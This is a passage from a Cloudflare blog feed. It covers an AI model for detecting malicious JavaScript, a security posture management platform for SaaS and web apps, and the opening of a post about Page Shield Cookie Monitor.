          </figure><p><sup><i>Graph neural network architecture, transforming the input tree with features down to the 4 classification probabilities.</i></sup></p><p>The model’s output probabilities are finally inverted and scaled into <a href="https://developers.cloudflare.com/page-shield/how-it-works/malicious-script-detection/#malicious-script-detection"><u>scores</u></a> (ranging from 1 to 99). The “js_integrity” score aggregates the malicious classes (magecart, malware, cryptomining). A low score means likely malicious, and a high score means likely benign. We use this output format for consistency with other Cloudflare detection systems, such as <a href="https://developers.cloudflare.com/page-shield/how-it-works/malicious-script-detection/#malicious-script-detection"><u>Bot Management</u></a> and the <a href="https://developers.cloudflare.com/waf/detections/attack-score/"><u>WAF Attack Score</u></a>. The following diagram illustrates the preprocessing and feature analysis pipeline of the model down to the inference results.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/zLPW9kydBIJySfjaN2TTI/d7b9a7f51c1bb501aac2b7a724d62a1d/5.png" />
          </figure><p><sup><i>Model inference pipeline to sniff out and alert on malicious JavaScript.</i></sup></p>
    <div>
      <h4>Tackling unbalanced data: malicious scripts are the minority</h4>
      <a href="#tackling-unbalanced-data-malicious-scripts-are-the-minority">
        
      </a>
    </div>
    <p>Finding malicious scripts is like finding a needle in a haystack; they are anomalies among plenty of otherwise benign JavaScript. This naturally results in a highly imbalanced dataset. For example, our Magecart-labeled scripts only account for ~6% of the total dataset.</p><p>Not only that, but the “benign” category contains an immense variance (and amount) of JavaScript to classify. The lengths of the scripts are highly diverse (ranging from just a few bytes to several megabytes), their coding styles vary widely, some are obfuscated whereas others are not, etc. To make matters worse, malicious payloads are often just small, carefully inserted fragments within an otherwise perfectly valid and functional benign script. This all creates a cacophony of token distributions for an ML model to make sense of.</p><p>Still, our biggest problem remains finding enough malevolent JavaScript to add to our training dataset. Thus, simplifying it, our strategy for data collection and annotation is two-fold:</p><ol><li><p>Malicious scripts are about quantity → the more, the merrier (for our model, that is 😉). Of course, we still care about quality and diversity. But because we have so few of them (in comparison to the number of benign scripts), we take what we can.</p></li><li><p>Benign scripts are about quality → the more <i>variance</i>, the merrier. Here we have the opposite situation. Because we can collect so many of them easily, the value is in adding differentiated scripts.</p></li></ol>
    <div>
      <h5>Learning key scripts only: reduce false positives with minimal annotation time</h5>
      <a href="#learning-key-scripts-only-reduce-false-positives-with-minimal-annotation-time">
        
      </a>
    </div>
    <p>To filter out semantically-similar scripts (mostly benign), we employed the latest advancements in LLM for generating code <a href="https://www.cloudflare.com/learning/ai/what-are-embeddings/"><u>embeddings</u></a>. We added those scripts that are distant enough from each other to our dataset, as measured by <a href="https://developers.cloudflare.com/vectorize/best-practices/create-indexes/#distance-metrics"><u>vector cosine similarity</u></a>. Our methodology is simple — for a batch of potentially new scripts:</p><ul><li><p>Initialize an empty <a href="https://www.cloudflare.com/learning/ai/what-is-vector-database/"><u>vector database</u></a>. For local experimentation, we are fans of <a href="https://docs.trychroma.com/docs/overview/introduction"><u>Chroma DB</u></a>.</p></li><li><p>For each script:</p><ul><li><p>Call an LLM to generate its embedding. We’ve had good results with <a href="https://github.com/bigcode-project/starcoder2"><u>starcoder2</u></a>, and most recently <a href="https://huggingface.co/Qwen/Qwen2.5-Coder-32B"><u>qwen2.5-coder</u></a>.</p></li><li><p>Search in the database for the top-1 closest other script’s vectors.</p></li><li><p>If the distance &gt; threshold (0.10), select it and add it to the database.</p></li><li><p>Else, discard the script (though we consider it for further validations and tests).</p></li></ul></li></ul><p>Although this methodology has an inherent bias in gradually favoring the first seen scripts, in practice we’ve used it for batches of newly and randomly sampled JavaScript only. To review the whole existing dataset, we could employ other but similar strategies, like applying <a href="https://scikit-learn.org/stable/modules/generated/sklearn.cluster.HDBSCAN.html"><u>HDBSCAN</u></a> to identify an unknown number of clusters and then selecting the medoids, boundary, and anomaly data points.</p><p>We’ve successfully employed this strategy for pinpointing a few highly varied scripts that were relevant for the model to learn from. Our security researchers save a tremendous amount of time on manual annotation, while false positives are drastically reduced. For instance, in a large and unlabeled bucket of scripts, one of our early evaluation models identified ~3,000 of them as malicious. That’s too many to manually review! By removing near duplicates, we narrowed the need for annotation down to only 196 samples, less than 7% of the original amount (see the <a href="https://en.wikipedia.org/wiki/T-distributed_stochastic_neighbor_embedding"><u>t-SNE</u></a> visualization below of selected points and clusters). Three of those scripts were actually malicious, one we could not fully determine, and the rest were benign. By just re-training with these new labeled scripts, a tiny fraction of our whole dataset, we reduced false positives by 50% (as gauged in the same bucket and in a controlled test set). We have consistently repeated this procedure to iteratively enhance successive model versions.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/hHw00ojXE4CdorMQI5b56/897e0e045230522478e0735c3e28ff12/6.png" />
          </figure><p><sup><i>2D visualization of scripts projected onto an embedding space, highlighting those sufficiently dissimilar from one another.</i></sup></p>
    <div>
      <h4>From the lab, to the real world</h4>
      <a href="#from-the-lab-to-the-real-world">
        
      </a>
    </div>
    <p>Our latest model in evaluation has both a macro accuracy and an overall malicious precision nearing 99%(!) on our test dataset. So we are done, right? Wrong! The real world is not the same as the lab, where many more variances of benign JavaScript can be seen. To further assure minimum prediction changes between model releases, we follow these three anti-fool measures:</p>
    <div>
      <h5>Evaluate metrics uncertainty</h5>
      <a href="#evaluate-metrics-uncertainty">
        
      </a>
    </div>
    <p>First, we thoroughly estimate the <i>uncertainty</i> of our offline evaluation metrics. How accurate are our accuracy metrics themselves? To gauge that, we calculate the <a href="https://en.wikipedia.org/wiki/Standard_error"><u>standard error</u></a> and confidence intervals for our offline metrics (precision, recall, <a href="https://en.wikipedia.org/wiki/F-score"><u>F1 measure</u></a>). To do that, we calculate the model’s predicted scores on the test set once (the original sample), and then generate bootstrapped resamples from it. We use simple random (re-)sampling as it offers us a more conservative estimate of error than stratified or balanced sampling.</p><p>We would generate 1,000 resamples, each a fraction of 15% resampled from the original test sample, then calculate the metrics for each individual resample. This results in a distribution of sampled data points. We measure its mean, the standard deviation (with <a href="https://en.wikipedia.org/wiki/Standard_deviation#Corrected_sample_standard_deviation"><u>Bessel’s correction</u></a>), and finally the standard error and a <a href="https://en.wikipedia.org/wiki/Confidence_interval"><u>confidence interval</u></a> (CI) (using the percentile method, such as the 2.5 and 97.5 percentiles for a 95% CI). See below for an example of a bootstrapped distribution for precision (P), illustrating that a model’s performance is a continuum rather than a fixed value, and that might exhibit subtly (left-)skewed tails. For some of our internally evaluated models, it can easily happen that some of the sub-sampled metrics decrease by up to 20 percentage points within a 95% confidence range. High standard errors and/or confidence ranges signal needs for model improvement and for improving and increasing our test set.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2x3X2oVv2EfIkLYFrcjLWK/985a685e565f759b7781821595ac4ff7/7.png" />
          </figure><p><sup><i>An evaluation metric, here precision (P), might change significantly depending on what’s exactly tested. We thoroughly estimate the metric’s standard error and confidence intervals.</i></sup></p>
    <div>
      <h5>Benchmark against massive offline unlabeled dataset</h5>
      <a href="#benchmark-against-massive-offline-unlabeled-dataset">
        
      </a>
    </div>
    <p>We run our model on the entire corpus of scripts seen by Cloudflare's network and temporarily cached in the last 90 days. By the way, that’s nearly 1 TiB and 26 million different JavaScript files! With that, we can observe the model’s behavior against real traffic, yet completely offline (to ensure no impact to production). We check the malicious prediction rate, latency, throughput, etc. and sample some of the predictions for verification and annotation.</p>
    <div>
      <h5>Review in staging and shadow mode</h5>
      <a href="#review-in-staging-and-shadow-mode">
        
      </a>
    </div>
    <p>Only after all the previous checks were cleared, we then run this new tentative version in our staging environment. For major model upgrades, we also deploy them in <a href="https://cloud.google.com/architecture/guidelines-for-developing-high-quality-ml-solutions"><u>shadow mode</u></a> (log-only mode) — running on production, alongside our existing model. We study the model’s behavior for a while before finally marking it as production ready, otherwise we go back to the drawing board.</p>
    <div>
      <h3>AI inference at scale</h3>
      <a href="#ai-inference-at-scale">
        
      </a>
    </div>
    <p>At the time of writing, Page Shield sees an average of <i>40,000 scripts per second</i>. Many of those scripts are repeated, though. Everything on the Internet follows a <a href="https://blog.cloudflare.com/making-waf-ai-models-go-brr/#caching-inference-result"><u>Zipf's law distribution</u></a>, and JavaScript seen on the Cloudflare network is no exception. For instance, it is estimated that different versions of the <a href="https://blog.cloudflare.com/page-shield-positive-blocking-policies/#client-side-libraries"><u>Bootstrap library run on more than 20% of websites</u></a>. It would be a waste of computing resources if we repeatedly re-ran the AI model for the very same inputs — inference result caching is needed. Not to mention, GPU utilization is expensive!</p><p>The question is, what is the best way to cache the scripts? We could take an <a href="https://csrc.nist.gov/glossary/term/sha_256"><u>SHA-256</u></a> hash of the plain content as is. However, any single change in the transmitted content (comments, spacing, or a different character set) changes the SHA-256 output hash.</p><p>A better caching approach? Since we need to parse the code into syntax trees for our GNN model anyway, this tree structure and content is what we use to hash the JavaScript. As described above, we filter out nodes in the syntax tree like comments or empty statements. In addition, some irrelevant details get abstracted out in the AST (escape sequences are unescaped, the way of writing strings is normalized, unnecessary parentheses are removed for the operations order is encoded in the tree, etc.).</p><p>Using such a tree-based approach to caching, we can conclude that at any moment over 99.9% of reported scripts have already been seen in our network! Unless we deploy a new model with significant improvements, we don’t re-score previously seen JavaScript but just return the cached score. As a result, the model only needs to be called <i>fewer than 10 times per minute</i>, even during peak times!</p>
    <div>
      <h3>Let AI help ease PCI DSS v4 compliance</h3>
      <a href="#let-ai-help-ease-pci-dss-v4-compliance">
        
      </a>
    </div>
    <p>One of the most popular use cases for deploying Page Shield is to help meet the two new client-side security requirements in PCI DSS v4 — <a href="https://assets.ctfassets.net/slt3lc6tev37/4HJex2kG7FCb1IJRC9rIhL/081fdd8b1a471def14cfd415f99e4b58/Evaluation_Page_Shield_091124_FINAL.pdf"><u>6.4.3 and 11.6.1</u></a>. These requirements make companies responsible for approving scripts used in payment pages, where payment card data could be compromised by malicious JavaScript. Both of these requirements <a href="https://blog.pcisecuritystandards.org/countdown-to-pci-dss-v4.0"><u>become effective</u></a> on March 31, 2025.</p><p>Page Shield with AI malicious JavaScript detection can be deployed with just a few clicks, especially if your website is already proxied through Cloudflare. <a href="https://www.cloudflare.com/page-shield/"><u>Sign up here</u></a> to fast track your onboarding!</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Page Shield]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Machine Learning]]></category>
            <category><![CDATA[Malicious JavaScript]]></category>
            <category><![CDATA[JavaScript]]></category>
            <guid isPermaLink="false">3VQUOQBWzT8cc7oFFv003i</guid>
            <dc:creator>Juan Miguel Cejuela</dc:creator>
            <dc:creator>Zhiyuan Zheng</dc:creator>
        </item>
        <item>
            <title><![CDATA[One platform to manage your company’s predictive security posture with Cloudflare]]></title>
            <link>https://blog.cloudflare.com/cloudflare-security-posture-management/</link>
            <pubDate>Tue, 18 Mar 2025 13:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare introduces a single platform for unified security posture management, helping protect SaaS and web applications deployed across various environments.  ]]></description>
            <content:encoded><![CDATA[ <p>In today’s fast-paced digital landscape, companies are managing an increasingly complex mix of environments — from SaaS applications and public cloud platforms to on-prem data centers and hybrid setups. This diverse infrastructure offers flexibility and scalability, but also opens up new attack surfaces.</p><p>To support both business continuity and security needs, “security must evolve from being <a href="https://blog.cloudflare.com/welcome-to-security-week-2025/#how-can-we-help-make-the-internet-better"><u>reactive to predictive</u></a>”. Maintaining a healthy security posture entails monitoring and strengthening your security defenses to identify risks, ensure compliance, and protect against evolving threats. With our newest capabilities, you can now use Cloudflare to achieve a healthy posture across your SaaS and web applications. This addresses any security team’s ultimate (daily) question: <i>How well are our assets and documents protected</i>?</p><p>A predictive security posture relies on the following key components:</p><ul><li><p>Real-time discovery and inventory of all your assets and documents</p></li><li><p>Continuous asset-aware threat detection and risk assessment</p></li><li><p>Prioritised remediation suggestions to increase your protection</p></li></ul><p>Today, we are sharing how we have built these key components across SaaS and web applications, and how you can use them to manage your business’s security posture.</p>
    <div>
      <h3>Your security posture at a glance</h3>
      <a href="#your-security-posture-at-a-glance">
        
      </a>
    </div>
    <p>Regardless of the applications you have <a href="https://developers.cloudflare.com/reference-architecture/architectures/security/#using-cloudflare-to-protect-your-business"><u>connected to</u></a> Cloudflare’s global network, Cloudflare actively scans for risks and misconfigurations associated with each one of them on a <a href="https://developers.cloudflare.com/security-center/security-insights/how-it-works/#scan-frequency"><u>regular cadence</u></a>. Identified risks and misconfigurations are surfaced in the dashboard under <a href="https://dash.cloudflare.com/?to=/:account/security-center"><u>Security Center</u></a> as insights.</p><p>Insights are grouped by their severity, type of risks, and corresponding Cloudflare solution, providing various angles for you to zoom in to what you want to focus on. When applicable, a one-click resolution is provided for selected insight types, such as setting <a href="https://developers.cloudflare.com/ssl/edge-certificates/additional-options/minimum-tls/"><u>minimum TLS version</u></a> to 1.2 which is <a href="https://developers.cloudflare.com/ssl/reference/protocols/#decide-which-version-to-use"><u>recommended by PCI DSS</u></a>. This simplicity is highly appreciated by customers that are managing a growing set of assets being deployed across the organization.</p><p>To help shorten the time to resolution even further, we have recently added <a href="https://www.cloudflare.com/learning/access-management/role-based-access-control-rbac/"><u>role-based access control (RBAC)</u></a> to <a href="https://developers.cloudflare.com/security-center/security-insights/"><u>Security Insights</u></a> in the Cloudflare dashboard. Now for individual security practitioners, they have access to a distilled view of the insights that are relevant for their role. A user with an <a href="https://developers.cloudflare.com/fundamentals/setup/manage-members/roles/"><u>administrator role</u></a> (a CSO, for example) has access to, and visibility into, all insights.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/bnaU55Fi2z9bxUxl5pf7o/818043fbba2ae13c5a7c4cb25e5e7ebc/1.png" />
          </figure><p>In addition to account-wide Security Insights, we also provide posture overviews that are closer to the corresponding security configurations of your SaaS and web applications. Let’s dive into each of them.</p>
    <div>
      <h3>Securing your SaaS applications</h3>
      <a href="#securing-your-saas-applications">
        
      </a>
    </div>
    <p>Without centralized posture management, SaaS applications can feel like the security wild west. They contain a wealth of sensitive information – files, databases, workspaces, designs, invoices, or anything your company needs to operate, but control is limited to the vendor’s settings, leaving you with less visibility and fewer customization options. Moreover, team members are constantly creating, updating, and deleting content that can cause configuration drift and data exposure, such as sharing files publicly, adding PII to non-compliant databases, or giving access to third party integrations. With Cloudflare, you have visibility across your SaaS application fleet in one dashboard.</p>
    <div>
      <h4>Posture findings across your SaaS fleet</h4>
      <a href="#posture-findings-across-your-saas-fleet">
        
      </a>
    </div>
    <p>From the account-wide Security Insights, you can review insights for potential SaaS security issues:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7JRKfYveWKayrMxdLxLvDB/1c3383209462917214ad9dc6584e98fe/2.png" />
          </figure><p>You can choose to dig further with <a href="https://developers.cloudflare.com/cloudflare-one/applications/casb/"><u>Cloud Access Security Broker (CASB)</u></a> for a thorough review of the misconfigurations, risks, and failures to meet best practices across your SaaS fleet. You can identify a wealth of security information including, but not limited to:</p><ul><li><p>Publicly available or externally shared files</p></li><li><p>Third-party applications with read or edit access</p></li><li><p>Unknown or anonymous user access</p></li><li><p>Databases with exposed credentials</p></li><li><p>Users without two-factor authentication</p></li><li><p>Inactive user accounts</p></li></ul><p>You can also explore the <i>Posture Findings </i>page, which provides easy searching and navigation across documents that are stored within the SaaS applications.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6skScbapgiG31w5qRoTCjG/ba3b069de8cce0c0bfcb9f011a2df954/3.png" />
          </figure><p>Additionally, you can create policies to prevent configuration drift in your environment. Prevention-based policies help maintain a secure configuration and compliance standards, while reducing alert fatigue for Security Operations teams, and these policies can prevent the inappropriate movement or exfiltration of sensitive data. Unifying controls and visibility across environments makes it easier to lock down regulated data classes, maintain detailed audit trails via logs, and improve your security posture to reduce the risk of breaches.</p>
    <div>
      <h4>How it works: new, real-time SaaS documents discovery</h4>
      <a href="#how-it-works-new-real-time-saas-documents-discovery">
        
      </a>
    </div>
    <p>Delivering SaaS security posture information to our customers requires collecting vast amounts of data from a wide range of platforms. In order to ensure that all the documents living in your SaaS apps (files, designs, etc.) are secure, we need to collect information about their configuration — are they publicly shared, do third-party apps have access, is <a href="https://www.cloudflare.com/learning/access-management/what-is-multi-factor-authentication/"><u>multi-factor authentication (MFA)</u></a> enabled? </p><p>We previously did this with crawlers, which would pull data from the SaaS APIs. However, we were plagued with rate limits from the SaaS vendors when working with larger datasets. This forced us to work in batches and ramp scanning up and down as the vendors permitted. This led to stale findings and would make remediation cumbersome and unclear – for example, Cloudflare would be reporting that a file is still shared publicly for a short period after the permissions were removed, leading to customer confusion.</p><p>To fix this, we upgraded our data collection pipeline to be dynamic and real-time, reacting to changes in your environment as they occur, whether it’s a new security finding, an updated asset, or a critical alert from a vendor. We started with our Microsoft asset discovery and <a href="https://developers.cloudflare.com/cloudflare-one/applications/casb/casb-integrations/microsoft-365/"><u>posture findings</u></a>, providing you real-time insight into your Microsoft Admin Center, OneDrive, Outlook, and SharePoint configurations. We will be rapidly expanding support to additional SaaS vendors going forward.</p>
    <div>
      <h5>Listening for update events from Cloudflare Workers</h5>
      <a href="#listening-for-update-events-from-cloudflare-workers">
        
      </a>
    </div>
    <p>Cloudflare Workers serve as the entry point for vendor webhooks, handling asset change notifications from external services. The workflow unfolds as follows:</p><ul><li><p><b>Webhook listener:</b> An initial Worker acts as the webhook listener, receiving asset change messages from vendors.</p></li><li><p><b>Data storage &amp; queuing:</b> Upon receiving a message, the Worker uploads the raw payload of the change notification to Cloudflare R2 for persistence, and publishes it to a Cloudflare Queue dedicated to raw asset changes.</p></li><li><p><b>Transformation Worker:</b> A second Worker, bound as a consumer to the raw asset change queue, processes the incoming messages. This Worker transforms the raw vendor-specific data into a generic format suitable for CASB. The transformed data is then:</p><ul><li><p>Stored in Cloudflare R2 for future reference.</p></li><li><p>Published on another Cloudflare Queue, designated for transformed messages.</p></li></ul></li></ul>
    <div>
      <h5>CASB Processing: Consumers &amp; Crawlers</h5>
      <a href="#casb-processing-consumers-crawlers">
        
      </a>
    </div>
    <p>Once the transformed messages reach the CASB layer, they undergo further processing:</p><ul><li><p><b>Polling consumer:</b> CASB has a consumer that polls the transformed message queue. Upon receiving a message, it determines the relevant handler required for processing.</p></li><li><p><b>Crawler execution:</b> The handler then maps the message to an appropriate crawler, which interacts with the vendor API to fetch the most up-to-date asset details.</p></li><li><p><b>Data storage:</b> The retrieved asset data is stored in the CASB database, ensuring it is accessible for security and compliance checks.</p></li></ul><p>With this improvement, we are now processing 10 to 20 Microsoft updates per second, or 864,000 to 1.72 million updates daily, giving customers incredibly fast visibility into their environment. Look out for expansion to other SaaS vendors in the coming months. </p>
    <div>
      <h3>Securing your web applications</h3>
      <a href="#securing-your-web-applications">
        
      </a>
    </div>
    <p>A unique challenge of securing web applications is that no one size fits all. An asset-aware posture management bridges the gap between a universal security solution and unique business needs, offering tailored recommendations for security teams to protect what matters.</p>
    <div>
      <h4>Posture overview from attacks to threats and risks</h4>
      <a href="#posture-overview-from-attacks-to-threats-and-risks">
        
      </a>
    </div>
    <p>Starting today, all Cloudflare customers have access to Security Overview, a new landing page customized for each of your onboarded domains. This page aggregates and prioritizes security suggestions across all your web applications:</p><ol><li><p>Any (ongoing) attacks detected that require immediate attention</p></li><li><p>Disposition (mitigated, served by Cloudflare, served by origin) of all proxied traffic over the last 7 days</p></li><li><p>Summary of currently active security modules that are detecting threats</p></li><li><p>Suggestions of how to improve your security posture with a step-by-step guide</p></li><li><p>And a glimpse of your most active and lately updated security rules</p></li></ol>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3YhmhUZbZbAIZryUuTodpV/2b9563ac7768348bb4be46abc5fef7b3/4.png" />
          </figure><p>These tailored security suggestions are surfaced based on your traffic profile and business needs, which is made possible by discovering your proxied web assets.</p>
    <div>
      <h4>Discovery of web assets</h4>
      <a href="#discovery-of-web-assets">
        
      </a>
    </div>
    <p>Many web applications, regardless of their industry or use case, require similar functionality: user identification, accepting payment information, etc. By discovering the assets serving this functionality, we can build and run targeted threat detection to protect them in depth.</p><p>As an example, bot traffic towards marketing pages versus login pages have different business impacts. Content scraping may be happening targeting your marketing materials, which you may or may not want to allow, while credential stuffing on your login page deserves immediate attention.</p><p>Web assets are described by a list of endpoints; and labelling each of them defines their business goals. A simple example can be <code>POST</code> requests to path <code>/portal/login</code>, which likely describes an API for user authentication. While the <code>GET</code> requests to path <code>/portal/login</code> denote the actual login webpage.</p><p>To describe business goals of endpoints, labels come into play. <code>POST</code> requests to the <code>/portal/login</code> endpoint serving end users and to the<code> /api/admin/login</code> endpoint used by employees can both can be labelled using the same <code>cf-log-in</code> <a href="https://developers.cloudflare.com/api-shield/management-and-monitoring/endpoint-labels/#managed-labels"><u>managed label</u></a>, letting Cloudflare know that usernames and passwords would be expected to be sent to these endpoints.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7jFh9mc7hyryXHIqeQwS9U/25ba022282b43cff9f09700d0ae81c76/5.png" />
          </figure><p>API Shield customers can already make use of <a href="https://developers.cloudflare.com/api-shield/management-and-monitoring/endpoint-labels/"><u>endpoint labelling</u></a>. In early Q2 2025, we are adding label discovery and suggestion capabilities, starting with three labels, <code>cf-log-in</code>, <code>cf-sign-up</code>, and <code>cf-rss-feed</code>. All other customers can manually add these labels to the <a href="https://developers.cloudflare.com/api-shield/management-and-monitoring/"><u>saved endpoints</u></a>. One example, explained below, is preventing disposable emails from being used during sign-ups. </p>
    <div>
      <h4>Always-on threat detection and risk assessment</h4>
      <a href="#always-on-threat-detection-and-risk-assessment">
        
      </a>
    </div>
    
    <div>
      <h5>Use-case driven threat detection</h5>
      <a href="#use-case-driven-threat-detection">
        
      </a>
    </div>
    <p>Customers told us that, with the growing excitement around generative AI, they need support to secure this new technology while not hindering innovation. Being able to discover LLM-powered services allows fine-tuning security controls that are relevant for this particular technology, such as inspecting prompts, limit prompting rates based on token usage, etc. In a separate Security Week blog post, we will share how we build Cloudflare Firewall for AI, and how you can easily protect your generative AI workloads.</p><p>Account fraud detection, which encompasses multiple attack vectors, is another key area that we are focusing on in 2025.</p><p>On many login and signup pages, a <a href="https://www.cloudflare.com/learning/bots/how-captchas-work/"><u>CAPTCHA</u></a> solution is commonly used to only allow human beings through, assuming only bots perform undesirable actions. Put aside that most visual CAPTCHA puzzles can be easily <a href="https://arstechnica.com/ai/2024/09/ai-defeats-traffic-image-captcha-in-another-triumph-of-machine-over-man/"><u>solved by AI</u></a> nowadays, such an approach cannot effectively solve the <i>root cause</i> of most account fraud vectors. For example, human beings using disposable emails to sign up single-use accounts to take advantage of signup promotions.</p><p>To solve this fraudulent sign up issue, a security rule currently under development could be deployed as below to block all attempts that use disposable emails as a user identifier, regardless of whether the requester was automated or not. All existing or future <code>cf-log-in</code> and <code>cf-sign-up</code> labelled endpoints are protected by this single rule, as they both require user identification.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7sJzdnjp9UWrp35Hd3SsGB/db0959b457c555a4a1e93e5515a1e61f/6.png" />
          </figure><p>Our fast expanding use-case driven threat detections are all running by default, from the first moment you onboarded your traffic to Cloudflare. The instant available detection results can be reviewed through security analytics, helping you make swift informed decisions.</p>
    <div>
      <h5>API endpoint risk assessment</h5>
      <a href="#api-endpoint-risk-assessment">
        
      </a>
    </div>
    <p>APIs have their own set of risks and vulnerabilities, and today Cloudflare is delivering seven new risk scans through API Posture Management. This new capability of API Shield helps reduce risk by identifying security issues and fixing them early, before APIs are attacked. Because APIs are typically made up of many different backend services, security teams need to pinpoint which backend service is vulnerable so that development teams may remediate the identified issues.</p><p>Our new API posture management risk scans do exactly that: users can quickly identify which API endpoints are at risk to a number of vulnerabilities, including sensitive data exposure, authentication status, <a href="https://owasp.org/API-Security/editions/2023/en/0xa1-broken-object-level-authorization/"><u>Broken Object Level Authorization (BOLA)</u></a> attacks, and more.</p><p>Authentication Posture is one risk scan you’ll see in the new system. We focused on it to start with because sensitive data is at risk when API authentication is assumed to be enforced but is actually broken. <a href="https://developers.cloudflare.com/api-shield/security/authentication-posture/"><u>Authentication Posture</u></a> helps customers identify authentication misconfigurations for APIs and alerts of their presence. This is achieved by scanning for successful requests against the API and noting their authentication status. API Shield scans traffic daily and labels API endpoints that have missing and mixed authentication for further review.</p><p>For customers that have configured session IDs in API Shield, you can find the new risk scan labels and authentication details per endpoint in API Shield. Security teams can take this detail to their development teams to fix the broken authentication.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/21jVSrwsgfjKlyxyOZ5Qye/7963d95ea28a41f5e2b4f331ab5d5060/7.png" />
          </figure><p>We’re launching today with <a href="https://developers.cloudflare.com/api-shield/management-and-monitoring/endpoint-labels/"><u>scans</u></a> for authentication posture, sensitive data, underprotected APIs, BOLA attacks, and anomaly scanning for API performance across errors, latency, and response size.</p>
    <div>
      <h3>Simplify maintaining a good security posture with Cloudflare</h3>
      <a href="#simplify-maintaining-a-good-security-posture-with-cloudflare">
        
      </a>
    </div>
    <p>Achieving a good security posture in a fast-moving environment requires innovative solutions that can transform complexity into simplicity. Bringing together the ability to continuously assess threats and risks across both public and private IT environments through a single platform is our first step in supporting our customers’ efforts to maintain a healthy security posture.</p><p>To further enhance the relevance of security insights and suggestions provided and help you better prioritize your actions, we are looking into integrating Cloudflare’s global view of threat landscapes. With this, you gain additional perspectives, such as what the biggest threats to your industry are, and what attackers are targeting at the current moment. Stay tuned for more updates later this year.</p><p>If you haven’t done so yet, <a href="https://dash.cloudflare.com/?to=/:account/security-center"><u>onboard your SaaS and web applications</u></a> to Cloudflare today to gain instant insights into how to improve your business’s security posture.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Security Posture Management]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Security Center]]></category>
            <category><![CDATA[SAAS Security]]></category>
            <category><![CDATA[Application Security]]></category>
            <category><![CDATA[API Security]]></category>
            <category><![CDATA[Email Security]]></category>
            <guid isPermaLink="false">41Rkgr3IVvWI5n1DpmMDkJ</guid>
            <dc:creator>Zhiyuan Zheng</dc:creator>
            <dc:creator>Noelle Kagan</dc:creator>
            <dc:creator>John Cosgrove</dc:creator>
            <dc:creator>Frank Meszaros</dc:creator>
            <dc:creator>Yugesha Sapte</dc:creator>
        </item>
        <item>
            <title><![CDATA[Collect all your cookies in one jar with Page Shield Cookie Monitor]]></title>
            <link>https://blog.cloudflare.com/collect-all-your-cookies-in-one-jar/</link>
            <pubDate>Thu, 07 Mar 2024 14:00:09 GMT</pubDate>
            <description><![CDATA[ Protecting online privacy starts with knowing what cookies are used by your websites. Page Shield extends transparent monitoring to HTTP cookies, empowering security and compliance teams with an easy overview without the need for an external scanner, nor changing existing web applications ]]></description>
            <content:encoded><![CDATA[ <p></p><p><a href="https://www.cloudflare.com/learning/privacy/what-are-cookies/">Cookies</a> are small files of information that a web server generates and sends to a web browser. For example, a cookie stored in your browser will let a website know that you are already logged in, so instead of showing you a login page, you would be taken to your account page welcoming you back.</p><p>Though cookies are very useful, they are also used for tracking and advertising, sometimes with repercussions for user privacy. Cookies are a core tool, for example, for all advertising networks. To protect users, privacy laws may require website owners to clearly specify what cookies are being used and for what purposes, and, in many cases, to obtain a user's consent before storing those cookies in the user's browser. A key example of this is the <a href="https://gdpr.eu/cookies/#:~:text=Cookie%20compliance,cookies%20except%20strictly%20necessary%20cookies.">ePrivacy Directive</a>.</p><p>Herein lies the problem: often website administrators, developers, or compliance team members don’t know what cookies are being used by their website. A common approach for gaining a better understanding of cookie usage is to set up a scanner bot that crawls through each page, collecting cookies along the way. However, many websites requiring authentication or additional security measures do not allow for these scans, or require custom security settings to allow the scanner bot access.</p><p>To address these issues, we developed Page Shield Cookie Monitor, which provides a full single dashboard view of all first-party cookies being used by your websites. Over the next few weeks, we are rolling out Page Shield Cookie Monitor to all paid plans, no configuration or scanners required if Page Shield is enabled.</p>
    <div>
      <h3>HTTP cookies</h3>
      <a href="#http-cookies">
        
      </a>
    </div>
    <p><a href="https://en.wikipedia.org/wiki/HTTP_cookie">HTTP cookies</a> are designed to allow persistence for the stateless HTTP protocol. A basic example of cookie usage is to identify a logged-in user. The browser submits the cookie back to the website whenever you access it again, letting the website know who you are, providing you a customized experience. Cookies are implemented as <a href="https://en.wikipedia.org/wiki/List_of_HTTP_header_fields">HTTP headers</a>.</p><p>Cookies can be classified as first-party or third-party.</p><p>First-party cookies are normally set by the website owner<sup>1</sup>, and are used to track state against the given website. The logged in example above falls into this category. First party cookies are normally restricted and sent to the given website only and won’t be visible by other sites.</p><p>Third-party cookies, on the other hand, are often set by large advertising networks, social networks, or other large organizations that want to track user journeys across the web (across domains). For example, some websites load advertisement objects from a different domain that may set a third-party cookie associated with that advertising network.</p>
    <div>
      <h3>Cookies are used for tracking</h3>
      <a href="#cookies-are-used-for-tracking">
        
      </a>
    </div>
